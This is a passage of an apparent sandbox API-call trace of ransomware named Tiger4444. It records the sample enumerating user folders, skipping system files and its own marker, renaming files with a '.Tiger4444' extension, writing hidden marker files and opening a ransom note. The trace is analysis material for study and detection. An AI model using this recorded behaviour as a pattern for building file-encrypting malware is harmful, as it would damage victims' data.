hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.576] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0052.576] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.577] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0052.577] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.577] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0052.577] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14402979891) returned 1 [0052.577] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0052.577] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0052.577] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.577] CloseHandle (hObject=0x2a4) returned 1 [0052.577] CloseHandle (hObject=0x2c8) returned 1 [0052.577] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.Tiger4444") returned 75 [0052.577] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\recent\\index.dat.tiger4444"), dwFlags=0x1) returned 1 [0052.578] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a0aa18, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x15a0aa18, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x15a7d124, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 1 [0052.578] lstrcmpiW (lpString1="Templates.LNK", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.578] lstrcmpiW (lpString1="Templates.LNK", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.578] lstrcmpiW (lpString1="Templates.LNK", lpString2="Tiger4444.exe") returned -1 [0052.578] lstrcmpiW (lpString1="Templates.LNK", lpString2=".") returned 1 [0052.578] lstrcmpiW (lpString1="Templates.LNK", lpString2="..") returned 1 [0052.578] lstrcmpiW (lpString1="Templates.LNK", lpString2="windows") returned -1 [0052.578] lstrcmpiW (lpString1="Templates.LNK", lpString2="bootmgr") returned 1 [0052.578] lstrcmpiW (lpString1="Templates.LNK", lpString2="pagefile.sys") returned 1 [0052.578] lstrcmpiW (lpString1="Templates.LNK", lpString2="boot") returned 1 [0052.578] lstrcmpiW (lpString1="Templates.LNK", lpString2="ids.txt") returned 1 [0052.578] lstrcmpiW (lpString1="Templates.LNK", lpString2="NTUSER.DAT") returned 1 [0052.578] lstrcpyW (in: lpString1=0x30aeb18, lpString2="Templates.LNK" | out: lpString1="Templates.LNK") returned="Templates.LNK" [0052.578] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK", dwFileAttributes=0x0) returned 1 [0052.581] lstrlenW (lpString="Templates.LNK") returned 13 [0052.581] lstrlenW (lpString="Tiger4444") returned 9 [0052.581] lstrcmpiW (lpString1="lates.LNK", lpString2="Tiger4444") returned -1 [0052.581] lstrlenW (lpString=".dll") returned 4 [0052.581] lstrcmpiW (lpString1=".LNK", lpString2=".dll") returned 1 [0052.581] lstrlenW (lpString=".lnk") returned 4 [0052.581] lstrcmpiW (lpString1=".LNK", lpString2=".lnk") returned 0 [0052.581] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a0aa18, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x15a0aa18, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x15a7d124, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 0 [0052.581] FindClose (in: hFindFile=0xc73108 | out: hFindFile=0xc73108) returned 1 [0052.581] lstrcpyW (in: lpString1=0x30aeb18, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.581] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\recent\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.581] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.581] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.582] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.582] CloseHandle (hObject=0x2c8) returned 1 [0052.582] CloseHandle (hObject=0x2ac) returned 1 [0052.582] GetCurrentThreadId () returned 0xfa8 [0052.582] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66368 [0052.582] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network" [0052.582] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7a350 | out: hHeap=0xc50000) returned 1 [0052.582] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66360 | out: hHeap=0xc50000) returned 1 [0052.582] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network" [0052.582] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\" [0052.582] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\.BFC0E91B00AE8A0620D3" [0052.582] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.583] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.586] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.586] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.587] CloseHandle (hObject=0x2ac) returned 1 [0052.587] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network") returned 49 [0052.587] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.587] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3fa09c, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xab3fa09c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x845b5b02, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0052.588] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.588] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.588] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.588] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.588] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3fa09c, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xab3fa09c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x845b5b02, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.588] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.588] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.588] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.588] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.588] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.588] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x845b5b02, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x845b5b02, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x845dbe56, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.588] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.588] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.588] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3fa09c, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb0d62598, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb0d62598, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0052.588] lstrcmpiW (lpString1="Connections", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.588] lstrcmpiW (lpString1="Connections", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.588] lstrcmpiW (lpString1="Connections", lpString2="Tiger4444.exe") returned -1 [0052.588] lstrcmpiW (lpString1="Connections", lpString2=".") returned 1 [0052.588] lstrcmpiW (lpString1="Connections", lpString2="..") returned 1 [0052.588] lstrcmpiW (lpString1="Connections", lpString2="windows") returned -1 [0052.588] lstrcmpiW (lpString1="Connections", lpString2="bootmgr") returned 1 [0052.588] lstrcmpiW (lpString1="Connections", lpString2="pagefile.sys") returned -1 [0052.588] lstrcmpiW (lpString1="Connections", lpString2="boot") returned 1 [0052.588] lstrcmpiW (lpString1="Connections", lpString2="ids.txt") returned -1 [0052.588] lstrcmpiW (lpString1="Connections", lpString2="NTUSER.DAT") returned -1 [0052.588] lstrcpyW (in: lpString1=0x30aeb0c, lpString2="Connections" | out: lpString1="Connections") returned="Connections" [0052.588] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66360 [0052.588] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x7c) returned 0xc721d0 [0052.588] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66368 | out: ListHead=0xc66828, ListEntry=0xc66368) returned 0xc66668 [0052.588] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3fa09c, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb0d62598, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb0d62598, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 0 [0052.588] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0052.588] lstrcpyW (in: lpString1=0x30aeb0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.588] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.590] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.590] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.590] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.590] CloseHandle (hObject=0x2c8) returned 1 [0052.590] CloseHandle (hObject=0x2ac) returned 1 [0052.591] GetCurrentThreadId () returned 0xfa8 [0052.591] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66368 [0052.591] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0052.591] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0052.591] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66360 | out: hHeap=0xc50000) returned 1 [0052.591] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0052.591] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\" [0052.591] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\.BFC0E91B00AE8A0620D3" [0052.591] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.617] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.626] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.627] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.628] CloseHandle (hObject=0x2ac) returned 1 [0052.628] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned 61 [0052.628] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.628] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3fa09c, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb0d62598, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x84601f17, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0052.628] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.628] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.628] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.628] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.628] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3fa09c, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb0d62598, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x84601f17, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.628] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.628] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.628] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.628] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.628] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.629] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x84601f17, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x84601f17, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x84628256, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.629] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.629] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.629] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae631a53, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae631a53, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae631a53, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cm", cAlternateFileName="")) returned 1 [0052.629] lstrcmpiW (lpString1="Cm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.629] lstrcmpiW (lpString1="Cm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.629] lstrcmpiW (lpString1="Cm", lpString2="Tiger4444.exe") returned -1 [0052.629] lstrcmpiW (lpString1="Cm", lpString2=".") returned 1 [0052.629] lstrcmpiW (lpString1="Cm", lpString2="..") returned 1 [0052.629] lstrcmpiW (lpString1="Cm", lpString2="windows") returned -1 [0052.629] lstrcmpiW (lpString1="Cm", lpString2="bootmgr") returned 1 [0052.629] lstrcmpiW (lpString1="Cm", lpString2="pagefile.sys") returned -1 [0052.629] lstrcmpiW (lpString1="Cm", lpString2="boot") returned 1 [0052.629] lstrcmpiW (lpString1="Cm", lpString2="ids.txt") returned -1 [0052.629] lstrcmpiW (lpString1="Cm", lpString2="NTUSER.DAT") returned -1 [0052.629] lstrcpyW (in: lpString1=0x30aeb24, lpString2="Cm" | out: lpString1="Cm") returned="Cm" [0052.629] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66360 [0052.629] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x82) returned 0xc790d8 [0052.629] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66368 | out: ListHead=0xc66828, ListEntry=0xc66368) returned 0xc66668 [0052.629] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd38f794c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc2d8352f, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pbk", cAlternateFileName="")) returned 1 [0052.629] lstrcmpiW (lpString1="Pbk", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.629] lstrcmpiW (lpString1="Pbk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.629] lstrcmpiW (lpString1="Pbk", lpString2="Tiger4444.exe") returned -1 [0052.629] lstrcmpiW (lpString1="Pbk", lpString2=".") returned 1 [0052.629] lstrcmpiW (lpString1="Pbk", lpString2="..") returned 1 [0052.629] lstrcmpiW (lpString1="Pbk", lpString2="windows") returned -1 [0052.629] lstrcmpiW (lpString1="Pbk", lpString2="bootmgr") returned 1 [0052.629] lstrcmpiW (lpString1="Pbk", lpString2="pagefile.sys") returned 1 [0052.629] lstrcmpiW (lpString1="Pbk", lpString2="boot") returned 1 [0052.629] lstrcmpiW (lpString1="Pbk", lpString2="ids.txt") returned 1 [0052.629] lstrcmpiW (lpString1="Pbk", lpString2="NTUSER.DAT") returned 1 [0052.629] lstrcpyW (in: lpString1=0x30aeb24, lpString2="Pbk" | out: lpString1="Pbk") returned="Pbk" [0052.629] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc916c8 [0052.629] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x84) returned 0xc78aa8 [0052.629] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc916d0 | out: ListHead=0xc66828, ListEntry=0xc916d0) returned 0xc66368 [0052.629] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae631a53, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae631a53, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae631a53, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_hiddencm", cAlternateFileName="_HIDDE~2")) returned 1 [0052.629] lstrcmpiW (lpString1="_hiddencm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.629] lstrcmpiW (lpString1="_hiddencm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.629] lstrcmpiW (lpString1="_hiddencm", lpString2="Tiger4444.exe") returned -1 [0052.629] lstrcmpiW (lpString1="_hiddencm", lpString2=".") returned 1 [0052.630] lstrcmpiW (lpString1="_hiddencm", lpString2="..") returned 1 [0052.630] lstrcmpiW (lpString1="_hiddencm", lpString2="windows") returned -1 [0052.630] lstrcmpiW (lpString1="_hiddencm", lpString2="bootmgr") returned -1 [0052.630] lstrcmpiW (lpString1="_hiddencm", lpString2="pagefile.sys") returned -1 [0052.630] lstrcmpiW (lpString1="_hiddencm", lpString2="boot") returned -1 [0052.630] lstrcmpiW (lpString1="_hiddencm", lpString2="ids.txt") returned -1 [0052.630] lstrcmpiW (lpString1="_hiddencm", lpString2="NTUSER.DAT") returned -1 [0052.630] lstrcpyW (in: lpString1=0x30aeb24, lpString2="_hiddencm" | out: lpString1="_hiddencm") returned="_hiddencm" [0052.630] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc916a8 [0052.630] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x90) returned 0xc85ef0 [0052.630] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc916b0 | out: ListHead=0xc66828, ListEntry=0xc916b0) returned 0xc916d0 [0052.630] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae631a53, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae631a53, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae631a53, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_hiddencm", cAlternateFileName="_HIDDE~2")) returned 0 [0052.630] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0052.630] lstrcpyW (in: lpString1=0x30aeb24, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK 